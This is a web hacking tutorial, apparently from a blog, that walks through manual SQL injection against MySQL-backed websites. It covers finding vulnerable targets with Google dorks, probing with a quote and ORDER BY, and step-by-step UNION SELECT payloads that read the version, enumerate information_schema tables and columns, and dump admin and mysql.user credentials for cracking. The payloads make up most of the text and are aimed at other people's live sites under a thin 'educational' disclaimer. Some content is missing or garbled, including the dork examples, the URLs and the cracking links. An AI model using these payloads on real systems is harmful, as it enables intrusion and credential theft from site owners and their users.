Note: This article is for Educational Purposes only. Please Don't misuse it. DesiRocker and me are not responsible of any misuse done by you.
MySQL database is very common database system these days that websites use and you will surprise with the fact that its the most vulnerable database system ever.Its has unlimited loopholes and fixing them is a very tedious task. Here we will discuss how to exploit those vulnerabilities manually without any tool.
Hacking Websites using SQL Injection
1. Finding the target and vulnerable websites
First of all we must find out our target website. I have collected a lot of dorks i.e the vulnerability points of the websites. Some Google Searches can be awesomely utilized to find out vulnerable Websites.. Below is example of some queries..
Examples: Open the Google and copy paste these queries...
Search google for more google dorks to hack websites. I cannot put them on my website as they are too critical to discuss. We can discuss them in comments of this posts so keep posting and reading there.
2. Checking for Vulnerability on the website
Suppose we have website like this:-
To test this URL, we add a quote to it ‘
On executing it, if we get an error like this: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."Or something like that, that means the target website is vulnerable to sql injection and you can hack it.
3). Find the number of columns
To find number of columns we use statement ORDER BY (tells database how to order the result) so how to use it? Well just incrementing the number until we get an error.
h**p:// order by 1/* --> no error
h**p:// order by 2/* --> no error
h**p:// order by 3/* --> no error
h**p:// order by 4/* --> Error (we get message like this Unknown column '4' in 'order clause' or something like that)
that means that the it has 3 columns, cause we got an error on 4.
4). Check for UNION function
With union we can select more data in one sql statement.
So we have
h**p:// union all select 1,2,3/*
(we already found that number of columns are 3 in section 2). )
if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works .
5). Check for MySQL version
h**p:// union all select 1,2,3/*
NOTE: if /* not working or you get some error, then try --
it's a comment and it's important for our query to work properly.
Let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.
it should look like this
h**p:// union all select 1,@@version,3/*
If you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."
I didn't see any paper covering this problem, so i must write it .
What we need is convert() function
h**p:// union all select 1,convert(@@version using latin1),3/*
or with hex() and unhex()
h**p:// union all select 1,unhex(hex(@@version)),3/*
and you will get MySQL version .
6). Getting table and column name
Well if the MySQL version is less than 5 (i.e 4.1.33, 4.1.12...) <--- later i will describe for MySQL greater than 5 version.
we must guess table and column name in most cases.
common table names are: user/s, admin/s, member/s ...
common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...
i.e would be
h**p:// union all select 1,2,3 from admin/*
(we see number 2 on the screen like before, and that's good )
We know that table admin exists...
Now to check column names.
h**p:// union all select 1,username,3 from admin/*
(if you get an error, then try the other column name)
we get username displayed on screen, example would be admin, or superadmin etc...
now to check if column password exists
h**p:// union all select 1,password,3 from admin/*
(if you get an error, then try the other column name)
we seen password on the screen in hash or plain-text, it depends of how the database is set up
i.e md5 hash, mysql hash, sha1...
Now we must complete query to look nice
For that we can use concat() function (it joins strings)
h**p:// union all select 1,concat(username,0x3a,password),3 from admin/*
Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)
(there is another way for that, char(58), ascii value for : )
h**p:// union all select 1,concat(username,char(58),password),3 from admin/*
Now we get displayed username:password on screen, i.e admin:admin or admin:somehash
When you have this, you can login like admin or some superuser.
If can't guess the right table name, you can always try mysql.user (default)
It has user password columns, so example would be
h**p:// union all select 1,concat(user,0x3a,password),3 from mysql.user/*
7). MySQL 5
Like i said before i'm gonna explain how to get table and column names
in MySQL greater than 5.
For this we need information_schema. It holds all tables and columns in database.
To get tables we use table_name and information_schema.tables.
h**p:// union all select 1,table_name,3 from information_schema.tables/*
Here we replace the our number 2 with table_name to get the first table from information_schema.tables
displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.
h**p:// union all select 1,table_name,3 from information_schema.tables limit 0,1/*
note that i put 0,1 (get 1 result starting from the 0th)
now to view the second table, we change limit 0,1 to limit 1,1
h**p:// union all select 1,table_name,3 from information_schema.tables limit 1,1/*
the second table is displayed.
for third table we put limit 2,1
h**p:// union all select 1,table_name,3 from information_schema.tables limit 2,1/*
Keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc...
To get the column names the method is the same.
Here we use column_name and information_schema.columns
the method is same as above so example would be
h**p:// union all select 1,column_name,3 from information_schema.columns limit 0,1/*
The first column is diplayed.
The second one (we change limit 0,1 to limit 1,1)
h**p:// union all select 1,column_name,3 from information_schema.columns limit 1,1/*
The second column is displayed, so keep incrementing until you get something like
username,user,login, password, pass, passwd etc...
If you wanna display column names for specific table use this query. (where clause)
Let's say that we found table users.
h**p:// union all select 1,column_name,3 from information_schema.columns where table_name='users'/*
Now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.
Note that this won't work if the magic quotes is ON.
Let's say that we found colums user, pass and email.
Now to complete query to put them all together.
For that we use concat() , i decribe it earlier.
h**p:// union all select 1,concat(user,0x3a,pass,0x3a,email) from users/
What we get here is user:pass:email from table users.
But the passwords are in hash format so we need to crack the hash. Note 90% of hash are crackable but 10% are still there which are unable to crack. So don't feel bad if some hash doesn't crack.
For Cracking the MD5 hash values you can use this :
1) Check the net whether this hash is cracked before:
2) Crack the password with the help of a site:
3) Use a MD5 cracking software:
Password = OwlsNest
I hope you all have liked it and surely got something how SQL injection works. For more website hacking tutorials keep visiting..
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